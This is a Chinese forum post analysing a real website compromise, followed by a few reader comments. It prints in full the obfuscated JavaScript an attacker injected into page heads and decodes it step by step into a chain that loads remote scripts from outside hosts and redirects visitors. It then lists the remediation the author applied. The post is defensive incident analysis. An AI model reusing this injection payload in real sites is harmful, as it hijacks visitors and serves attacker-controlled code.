记录 - 网站被 HACK!

file
上周公司的一个网站被 hack 了,这里分享下攻击者在服务器上所做的趣事

网站是 hosting 在一个比较老的服务器上面,一直也没出过什么问题,被 hack 后,它会跳转到另外一个网页。

原因很简单:HMTL  head 里面被加载了跳转到其它页面的 JS 代码!


JS 是怎么被加载的

一开始以为是 XSS 攻击,在检查了数据库和代码后排除了这个可能性,然后想到是不是服务器的用户密码泄露了,后来证实确实是的,还好该用户在服务器上只有一些基本权限,没有造成比较严重的后果。

攻击者在服务器上面执行了一个简单的 PHP Script,还删除了记录用户运行命令的 bash history,不过我还是在 bash history 中看到了一些命令,比如:rm vqia9vfg.php

脚本 vqia9vfg.php 所执行的是在 storage/framework/views 下 PHP 文件里查找所有的 HTML head 元素,并且插入以下代码:

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 48, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));</script>

有趣的事情来了,这段代码到底干了什么?


JS 是如何运作的

首先需要简单了解下 JS 的 String.fromCharCodeeval function
因此以上的数字是 UTF-16 字符串,你可以去这个网站解析下代码:http://jdstiles.com/java/cct.html ,得到的第一次结果如下:

var somestring = document.createElement('script');
somestring.type = 'text/javascript';
somestring.async = true;
somestring.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 115, 116, 97, 116, 46, 106, 115, 63, 118, 61, 49, 46, 48, 46, 50);

var alls = document.getElementsByTagName('script');
var nt3 = true;
for ( var i = alls.length; i--;) {
  if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) {
    nt3 = false;
  }
}
if(nt3 == true) {
  document.getElementsByTagName("head")[0].appendChild(somestring);
}

可以看到里面还包含两段字符串,继续解析:

var somestring = document.createElement('script');
somestring.type = 'text/javascript';
somestring.async = true;
somestring.src = 'https://examhome.net/stat.js?v=1.0.2';
var alls = document.getElementsByTagName('script');

var nt3 = true;
for (var i = alls.length; i--;) {
  if (alls[i].src.indexOf('examhome') > -1) {
    nt3 = false;
  }
}
if (nt3 == true) {
  document.getElementsByTagName("head")[0].appendChild(somestring);
}

以上代码会加载 https://examhome.net/stat.js?v=1.0.2 到页面中(该链接已经无法打开),那这段 JS 又是什么?它其实会加载一段新的字符串:

118, 97, 114, 32, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 41, 59

解析后得到如下代码:

var simplelement = document.createElement('script');
simplelement.type = 'text/javascript';
simplelement.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 109, 112, 51, 46, 106, 115);
simplelement.async = true;
document.getElementsByTagName("head")[0].appendChild(simplelement);

里面还有字符串,继续解析:

var simplelement = document.createElement('script');
simplelement.type = 'text/javascript';
simplelement.src = 'https://mp3menu.org/mp3.js';
simplelement.async = true;
document.getElementsByTagName("head")[0].appendChild(simplelement);

此时又加载了一个新的的 JS 链接 https://mp3menu.org/mp3.js ,可以点开,它包含了以下代码:

eval(String.fromCharCode(40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 9, 9, 9, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 109, 112, 51, 109, 101, 110, 117, 61, 34, 41, 32, 62, 61, 32, 48, 41, 32, 123, 10, 10, 9, 9, 9, 125, 32, 101, 108, 115, 101, 32, 123, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 32, 61, 32, 110, 101, 119, 32, 68, 97, 116, 101, 40, 41, 59, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 46, 115, 101, 116, 84, 105, 109, 101, 40, 101, 120, 112, 105, 114, 121, 46, 103, 101, 116, 84, 105, 109, 101, 40, 41, 43, 40, 49, 48, 42, 54, 48, 42, 49, 48, 48, 48, 42, 54, 42, 56, 41, 41, 59, 10, 9, 9, 9, 32, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 32, 61, 32, 34, 109, 112, 51, 109, 101, 110, 117, 61, 121, 101, 115, 59, 32, 101, 120, 112, 105, 114, 101, 115, 61, 34, 32, 43, 32, 101, 120, 112, 105, 114, 121, 46, 116, 111, 71, 77, 84, 83, 116, 114, 105, 110, 103, 40, 41, 59, 10, 9, 9, 9, 32, 32, 118, 97, 114, 32, 109, 112, 51, 109, 101, 110, 117, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 49, 50, 44, 32, 49, 48, 52, 44, 32, 49, 49, 50, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 109, 112, 51, 109, 101, 110, 117, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 32, 61, 32, 109, 112, 51, 109, 101, 110, 117, 59, 10, 9, 9, 9, 125, 10, 32, 32, 125, 41, 40, 41, 59));

我也是醉了,只能继续解析:

(function () {
  if (document.cookie.indexOf("mp3menu=") >= 0) {
  } else {
    expiry = new Date();
    expiry.setTime(expiry.getTime() + (10 * 60 * 1000 * 6 * 8));
    document.cookie = "mp3menu=yes; expires=" + expiry.toGMTString();
    var mp3menu = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 114, 101, 100, 46, 112, 104, 112);
    window.location.replace(mp3menu);
    window.location.href = mp3menu;
  }
})();

感觉终于看见曙光了,最后一次解析,得到最终如下代码:

(function () {
  if (document.cookie.indexOf("mp3menu=") >= 0) {
  } else {
    expiry = new Date();
    expiry.setTime(expiry.getTime() + (10 * 60 * 1000 * 6 * 8));
    document.cookie = "mp3menu=yes; expires=" + expiry.toGMTString();
    var mp3menu = 'https://mp3menu.org/red.php';
    window.location.replace(mp3menu);
    window.location.href = mp3menu;
  }
})();

非常明显了,网页会被跳转到 https://mp3menu.org/red.php ,被 Hack 的网站的首页就自动跳转到了该页面。


其它的发现

页面其实还会加载另外一个 PHP 平台链接,它是用了 Open Analytics Platform Matomo 去记录被 hack 的网站的名称,URL等。


小结

开发不易,安全太重要!!!

当时立即采取的措施是:

  • 更新密码,重新检查该用户的权限。
  • 除了公司 IP 之外,block 掉了所有 IP 地址的 SSH 登录。
  • 如果想在其它地方登录:因为公司有个 diskstation 服务器,所以配置了 ssh tunnel through diskstation - 通过 diskstation 再进入服务器。当然进入 diskstation 必须使用 authorized keys,所以安全性得到了很大的提高。
本作品采用《CC 协议》,转载必须注明作者和本文链接
本帖由系统于 5年前 自动加精
jltxwesley
《L04 微信小程序从零到发布》
从小程序个人账户申请开始,带你一步步进行开发一个微信小程序,直到提交微信控制台上线发布。
《L02 从零构建论坛系统》
以构建论坛项目 LaraBBS 为线索,展开对 Laravel 框架的全面学习。应用程序架构思路贴近 Laravel 框架的设计哲学。
讨论数量: 4
jltxwesley

@lovecn

可能国内已经 block 掉了,你要是翻墙应该能打开。

5年前 评论
你看我吊吗啊

所以说黑客费这么大功夫只是为了增加他站点访问量。。。

5年前 评论
jltxwesley

@JeffLi

也显示出他的厉害,在 Matomo 里统计他所有 hack 过的网站,里面可以做些数据分析。

5年前 评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!